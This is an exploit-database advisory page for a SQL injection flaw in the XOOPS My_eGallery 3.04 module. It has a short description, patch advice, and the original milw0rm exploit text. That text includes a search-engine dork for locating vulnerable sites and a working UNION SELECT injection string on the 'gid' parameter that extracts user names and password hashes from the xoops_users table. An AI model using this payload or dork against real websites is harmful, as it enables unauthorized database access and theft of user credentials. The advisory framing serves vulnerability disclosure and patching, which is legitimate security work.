XOOPS Module My_eGallery 3.04

vendor:

My_eGallery

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: My_eGallery

Affected Version From: 03.04

Affected Version To: 03.04

Patch Exists: YES

Related CWE: N/A

CPE: a:xoops:my_egallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

XOOPS Module My_eGallery 3.04

A SQL injection vulnerability exists in XOOPS Module My_eGallery 3.04. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input to the 'gid' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

##########################################
#
# XOOPS Module My_eGallery 3.04
#
#download=http://webscripts.softpedia.com/script/Modules/Other-Modules/My-eGallery-dev-8113.html
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"modules/my_egallery"
#
###########################################
EXPLOIT :

modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*


###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-12]